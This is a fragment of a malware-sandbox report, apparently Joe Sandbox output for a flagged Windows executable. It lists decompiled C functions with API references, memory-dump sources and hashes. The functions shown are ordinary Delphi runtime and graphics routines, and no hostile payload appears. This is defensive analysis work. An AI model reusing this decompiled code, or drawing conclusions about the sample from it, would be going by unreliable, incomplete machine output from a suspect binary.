                                                    0x00426aa9
                                                    0x00426aac
                                                    0x00426aaf
                                                    0x00426ab2
                                                    0x00426abb
                                                    0x00426ac6
                                                    0x00426ad4
                                                    0x00426ada
                                                    0x00426ae2
                                                    0x00426aea
                                                    0x00426b07
                                                    0x00426b0c
                                                    0x00426b11
                                                    0x00426aec
                                                    0x00426af6
                                                    0x00426afa
                                                    0x00426b02
                                                    0x00426b02
                                                    0x00426b14
                                                    0x00426b16
                                                    0x00426b1b
                                                    0x00426b22
                                                    0x00426b24
                                                    0x00426b24
                                                    0x00426b2b
                                                    0x00426b2c
                                                    0x00426b31
                                                    0x00426b34
                                                    0x00426b37
                                                    0x00426b39
                                                    0x00426b3c
                                                    0x00426b3d
                                                    0x00426b44
                                                    0x00426b46
                                                    0x00426b49
                                                    0x00426b4a
                                                    0x00426b53
                                                    0x00426b59
                                                    0x00426b6b
                                                    0x00426b6d
                                                    0x00426b5b
                                                    0x00426b5b
                                                    0x00426b5b
                                                    0x00426b72
                                                    0x00426b75
                                                    0x00426b78
                                                    0x00426b7d
                                                    0x00426b80
                                                    0x00426b81
                                                    0x00426b83
                                                    0x00426b88

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 00426AEE
                                                    • GetSystemMetrics.USER32 ref: 00426AFA
                                                    • 733AAC50.USER32(00000000), ref: 00426B16
                                                    • 733AAD70.GDI32(00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B3D
                                                    • 733AAD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B4A
                                                    • 733AB380.USER32(00000000,00000000,00426B90,0000000E,00000000,00426B89,?,00000000), ref: 00426B83
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem$B380
                                                    • String ID:
                                                    • API String ID: 3145338429-0
                                                    • Opcode ID: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                    • Instruction ID: 72199b77af9d5ad6b2438074c355ca19ed48f1e35d4323483afc0bacfeaa441d
                                                    • Opcode Fuzzy Hash: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                    • Instruction Fuzzy Hash: 90316F74E00214AFEB00EF65C841AAEBBF5FB49750F51856AE814AB394C638A941CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00426F10 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 45%
                                                    			E00426F10(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E00426DC0(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L004072E0();
				_v16 = 0;
				_push(_t46);
				_push(0x426fad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00407440();
					_v12 = _t29;
					_push(_v16);
					L00407418();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(0x426fb4);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L00407440();
				}
				return DeleteDC(_v16);
			}











                                                    0x00426f19
                                                    0x00426f1d
                                                    0x00426f26
                                                    0x00426f2d
                                                    0x00426f30
                                                    0x00426f32
                                                    0x00426f37
                                                    0x00426f3c
                                                    0x00426f3d
                                                    0x00426f42
                                                    0x00426f45
                                                    0x00426f4a
                                                    0x00426f4c
                                                    0x00426f4e
                                                    0x00426f4f
                                                    0x00426f52
                                                    0x00426f53
                                                    0x00426f58
                                                    0x00426f5e
                                                    0x00426f5f
                                                    0x00426f5f
                                                    0x00426f7d
                                                    0x00426f83
                                                    0x00426f86
                                                    0x00426f89
                                                    0x00426f92
                                                    0x00426f94
                                                    0x00426f99
                                                    0x00426f9d
                                                    0x00426f9e
                                                    0x00426f9e
                                                    0x00426fac

                                                    APIs
                                                      • Part of subcall function 00426DC0: GetObjectA.GDI32(?,00000054), ref: 00426DD4
                                                    • 733AA590.GDI32(00000000), ref: 00426F32
                                                    • 733AB410.GDI32(?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F53
                                                    • 733AB150.GDI32(?,?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F5F
                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00426F76
                                                    • 733AB410.GDI32(?,00000000,00000000,00426FB4,?,00000000), ref: 00426F9E
                                                    • DeleteDC.GDI32(?), ref: 00426FA7
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B410$A590B150BitsDeleteObject
                                                    • String ID:
                                                    • API String ID: 3837315262-0
                                                    • Opcode ID: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                    • Instruction ID: 77de815d1256251625e09d43045054b0a879545964fd81c4b279a3d00da1559d
                                                    • Opcode Fuzzy Hash: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                    • Instruction Fuzzy Hash: C2114F75F082047FDB10DBA9DC41F9EBBECEB48714F5284AAB914E7281D678A900C769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00426750 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E00426750(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E004029DC(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L004072E0();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E004266B8(_t32) == 0) {
						E00426548( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L00407308();
					_t31 = _t15;
				}
				return _t31;
			}













                                                    0x0042675b
                                                    0x0042675d
                                                    0x00426765
                                                    0x0042679f
                                                    0x004267ad
                                                    0x00426767
                                                    0x00426767
                                                    0x00426769
                                                    0x0042676e
                                                    0x00426772
                                                    0x0042678b
                                                    0x00426792
                                                    0x00426798
                                                    0x00426798
                                                    0x004267b8
                                                    0x004267c0
                                                    0x004267d6
                                                    0x004267d6
                                                    0x004267db
                                                    0x004267dd
                                                    0x004267de
                                                    0x004267e3
                                                    0x004267e3
                                                    0x004267f0

                                                    APIs
                                                    • 733AA590.GDI32(00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 00426769
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00426772
                                                    • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3), ref: 00426786
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00426792
                                                    • DeleteDC.GDI32(00000000), ref: 00426798
                                                    • 733AA8F0.GDI32(?,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 004267DE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ObjectSelect$A590ColorDeleteTable
                                                    • String ID:
                                                    • API String ID: 1056449717-0
                                                    • Opcode ID: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                    • Instruction ID: efc5091b96ee346cfcb1bb7471c8c7bb22fdf2c070b44c7d61a8e62d02ab9fa2
                                                    • Opcode Fuzzy Hash: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                    • Instruction Fuzzy Hash: 8701847160832061E2246766AC43A6B72AC9FC0758F41882FB988A72C1E67C9845D3AB
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406B91 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00406B91(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x49e5bc)) =  *((intOrPtr*)(__eax - 0x49e5bc)) + __eax - 0x49e5bc;
				 *0x49b00c = 2;
				 *0x49e014 = 0x40124c;
				 *0x49e018 = 0x40125c;
				 *0x49e04e = 2;
				 *0x49e000 = E00405998;
				if(E00403A2C() != 0) {
					_t3 = E00403A5C();
				}
				E00403B20(_t3);
				 *0x49e054 = 0xd7b0;
				 *0x49e220 = 0xd7b0;
				 *0x49e3ec = 0xd7b0;
				 *0x49e040 = GetCommandLineA();
				 *0x49e03c = E004013AC();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x49e5c0 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x49e034 = _t11;
				return _t11;
			}





                                                    0x00406b91
                                                    0x00406b96
                                                    0x00406b9b
                                                    0x00406b9d
                                                    0x00406ba4
                                                    0x00406bae
                                                    0x00406bb8
                                                    0x00406bbf
                                                    0x00406bd0
                                                    0x00406bd2
                                                    0x00406bd2
                                                    0x00406bd7
                                                    0x00406bdc
                                                    0x00406be5
                                                    0x00406bee
                                                    0x00406bfc
                                                    0x00406c06
                                                    0x00406c1a
                                                    0x00406c53
                                                    0x00406c1c
                                                    0x00406c2a
                                                    0x00406c42
                                                    0x00406c2c
                                                    0x00406c2c
                                                    0x00406c2c
                                                    0x00406c2a
                                                    0x00406c58
                                                    0x00406c5d
                                                    0x00406c62

                                                    APIs
                                                      • Part of subcall function 00403A2C: GetKeyboardType.USER32 ref: 00403A31
                                                      • Part of subcall function 00403A2C: GetKeyboardType.USER32 ref: 00403A3D
                                                    • GetCommandLineA.KERNEL32 ref: 00406BF7
                                                    • GetVersion.KERNEL32 ref: 00406C0B
                                                    • GetVersion.KERNEL32 ref: 00406C1C
                                                    • GetCurrentThreadId.KERNEL32 ref: 00406C58
                                                      • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                      • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                      • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                    • GetThreadLocale.KERNEL32 ref: 00406C38
                                                      • Part of subcall function 00406AC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                    • String ID:
                                                    • API String ID: 3734044017-0
                                                    • Opcode ID: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                    • Instruction ID: fdcee0d7d708edd62114d02ed336596d20e14c9a9bb73fcb5a3f4b26375a27c1
                                                    • Opcode Fuzzy Hash: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                    • Instruction Fuzzy Hash: 52016DB4414351CAE710FFA7A8063583AA0AB2131DF05583FD541BA2F2FBBC01158B6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042AE8C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E0042AE8C(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				struct HPALETTE__* _v12;
				char _v13;
				intOrPtr _v25;
				intOrPtr _v29;
				intOrPtr _v33;
				intOrPtr _v57;
				short _v59;
				short _v61;
				intOrPtr _v65;
				intOrPtr _v69;
				intOrPtr _v73;
				intOrPtr _v77;
				intOrPtr _v89;
				intOrPtr _v93;
				void _v97;
				void* _t44;
				void* _t46;
				intOrPtr _t49;
				void* _t54;
				struct HPALETTE__* _t56;
				void* _t70;
				void* _t72;
				void* _t73;
				struct HDC__* _t74;
				intOrPtr _t95;
				void* _t105;
				void* _t107;
				void* _t108;
				intOrPtr _t110;

				_t105 = _t107;
				_t108 = _t107 + 0xffffffa0;
				_t70 = __edx;
				_v8 = __eax;
				_t44 = E00429FC8(_v8);
				if(_t70 == _t44) {
					L16:
					return _t44;
				} else {
					_t46 = _t70 - 1;
					if(_t46 < 0) {
						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
						goto L16;
					} else {
						if(_t46 == 7) {
							_t49 =  *0x49d90c; // 0x422ec0
							_t44 = E00425F28(_t49);
							goto L16;
						} else {
							E004032B4( &_v97, 0x54);
							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
							_t110 = _t108 + 0xc;
							_v13 = 0;
							_v77 = 0;
							_v73 = 0x28;
							_v69 = _v93;
							_v65 = _v89;
							_v61 = 1;
							_v59 =  *0x0049B8B3 & 0x000000ff;
							_t55 =  *((intOrPtr*)(_t54 + 0x10));
							_v12 =  *((intOrPtr*)(_t54 + 0x10));
							_t72 = _t70 - 2;
							if(_t72 == 0) {
								_t56 =  *0x49e894; // 0x770805ad
								_v12 = _t56;
							} else {
								_t73 = _t72 - 1;
								if(_t73 == 0) {
									_push(0);
									L00407638();
									_t74 = E00426060(_t55);
									_v12 = CreateHalftonePalette(_t74);
									_v13 = 1;
									_push(_t74);
									_push(0);
									L00407888();
								} else {
									if(_t73 == 2) {
										_v57 = 3;
										_v33 = 0xf800;
										_v29 = 0x7e0;
										_v25 = 0x1f;
									}
								}
							}
							 *[fs:eax] = _t110;
							 *((char*)(_v8 + 0x22)) = E00429AA8( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x42afd9, _t105),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
							_pop(_t95);
							 *[fs:eax] = _t95;
							_push(0x42afe0);
							if(_v13 != 0) {
								return DeleteObject(_v12);
							}
							return 0;
						}
					}
				}
			}

































                                                    0x0042ae8d
                                                    0x0042ae8f
                                                    0x0042ae95
                                                    0x0042ae97
                                                    0x0042ae9d
                                                    0x0042aea4
                                                    0x0042afeb
                                                    0x0042aff1
                                                    0x0042aeaa
                                                    0x0042aeac
                                                    0x0042aeae
                                                    0x0042aebd
                                                    0x00000000
                                                    0x0042aeb0
                                                    0x0042aeb2
                                                    0x0042aec5
                                                    0x0042aeca
                                                    0x00000000
                                                    0x0042aeb4
                                                    0x0042aede
                                                    0x0042aef4
                                                    0x0042aef4
                                                    0x0042aef6
                                                    0x0042aefc
                                                    0x0042aeff
                                                    0x0042af09
                                                    0x0042af0f
                                                    0x0042af12
                                                    0x0042af23
                                                    0x0042af27
                                                    0x0042af2a
                                                    0x0042af2d
                                                    0x0042af30
                                                    0x0042af3d
                                                    0x0042af42
                                                    0x0042af32
                                                    0x0042af32
                                                    0x0042af34
                                                    0x0042af47
                                                    0x0042af49
                                                    0x0042af53
                                                    0x0042af5b
                                                    0x0042af5e
                                                    0x0042af62
                                                    0x0042af63
                                                    0x0042af65
                                                    0x0042af36
                                                    0x0042af39
                                                    0x0042af6c
                                                    0x0042af73
                                                    0x0042af7a
                                                    0x0042af81
                                                    0x0042af81
                                                    0x0042af39
                                                    0x0042af34
                                                    0x0042af93
                                                    0x0042afb9
                                                    0x0042afbe
                                                    0x0042afc1
                                                    0x0042afc4
                                                    0x0042afcd
                                                    0x00000000
                                                    0x0042afd3
                                                    0x0042afd8
                                                    0x0042afd8
                                                    0x0042aeb2
                                                    0x0042aeae

                                                    APIs
                                                    • 733AAC50.USER32(00000000), ref: 0042AF49
                                                    • CreateHalftonePalette.GDI32(00000000,00000000), ref: 0042AF56
                                                    • 733AB380.USER32(00000000,00000000,00000000,00000000), ref: 0042AF65
                                                    • DeleteObject.GDI32(00000000), ref: 0042AFD3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380CreateDeleteHalftoneObjectPalette
                                                    • String ID: (
                                                    • API String ID: 733450718-3887548279
                                                    • Opcode ID: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                    • Instruction ID: 2a0d3ada1f03d7f2548bc3f3360be5a611323719477d61fc332258d066da6c8f
                                                    • Opcode Fuzzy Hash: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                    • Instruction Fuzzy Hash: AE41F470B04208DFDB00DFA8D585B9EB7F6EF49304F9140AAE804A7391C67C5E15DB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00422C88 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00422C88(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x49e668; // 0x400000
				 *0x49b5dc = _t6;
				_t8 =  *0x49b5f0; // 0x422c78
				_t9 =  *0x49e668; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00407540 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x49e668; // 0x400000
						_t20 =  *0x49b5f0; // 0x422c78
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x49b5cc);
				}
				_t13 =  *0x49e668; // 0x400000
				_t24 =  *0x49b5f0; // 0x422c78
				_t22 = E00407A8C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E00422BCC(_a4, _a8));
				}
				return _t22;
			}














                                                    0x00422c8f
                                                    0x00422c94
                                                    0x00422c9d
                                                    0x00422ca3
                                                    0x00422ca9
                                                    0x00422cb1
                                                    0x00422cb3
                                                    0x00422cb6
                                                    0x00422cc4
                                                    0x00422cc6
                                                    0x00422ccc
                                                    0x00422cd2
                                                    0x00422cd2
                                                    0x00422cdc
                                                    0x00422cdc
                                                    0x00422cf2
                                                    0x00422cff
                                                    0x00422d0f
                                                    0x00422d16
                                                    0x00422d27
                                                    0x00422d27
                                                    0x00422d32

                                                    APIs
                                                    • GetClassInfoA.USER32 ref: 00422CA9
                                                    • UnregisterClassA.USER32 ref: 00422CD2
                                                    • RegisterClassA.USER32 ref: 00422CDC
                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 00422D27
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                    • String ID: x,B
                                                    • API String ID: 4025006896-71347176
                                                    • Opcode ID: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                    • Instruction ID: 5edbcaf682720338496e3359f8b598ec737c219f81609156ea6670bddb9c1a51
                                                    • Opcode Fuzzy Hash: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                    • Instruction Fuzzy Hash: E0018E71744204BBDB00EB6AED81F9A7399EB28718F544137F904E73A1D679AC40CBAD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044E150 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E0044E150(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x49de44; // 0x49e744
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E0044E4D4(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) + ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                                    0x0044e152
                                                    0x0044e155
                                                    0x0044e157
                                                    0x0044e160
                                                    0x0044e177
                                                    0x0044e179
                                                    0x0044e180
                                                    0x0044e18c
                                                    0x0044e190
                                                    0x0044e19e
                                                    0x0044e1a5
                                                    0x0044e1a9
                                                    0x0044e1bb
                                                    0x0044e1c0
                                                    0x0044e1de
                                                    0x0044e1e2
                                                    0x0044e1f0
                                                    0x0044e1f7
                                                    0x00000000
                                                    0x0044e1fd
                                                    0x0044e1f7
                                                    0x0044e1c0
                                                    0x0044e1a5
                                                    0x0044e20a

                                                    APIs
                                                    • GetMenuItemInfoA.USER32 ref: 0044E19E
                                                    • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044E1F0
                                                    • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0044E1FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$InfoItem$Draw
                                                    • String ID: DI$P
                                                    • API String ID: 3227129158-1383934172
                                                    • Opcode ID: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                    • Instruction ID: 3c7080e089ef200bda1d0293621365d90923fd6ea2d15a2cda29d63b16e16469
                                                    • Opcode Fuzzy Hash: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                    • Instruction Fuzzy Hash: 2B1190716052006BE3109B29CC85B4A76D8BB85324F14866AF5A4CB3DAD679D844C74A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402944 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00402944(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E00404C30(_t25, 0x105,  &_v532);
			}










                                                    0x0040294c
                                                    0x0040294e
                                                    0x00402952
                                                    0x0040295c
                                                    0x0040295f
                                                    0x00402964
                                                    0x00402976
                                                    0x0040297c
                                                    0x0040297c
                                                    0x0040298b
                                                    0x00402992
                                                    0x0040299c
                                                    0x0040299c
                                                    0x004029b9

                                                    APIs
                                                    • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 00402976
                                                    • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040297C
                                                    • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 0040298B
                                                    • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040299C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
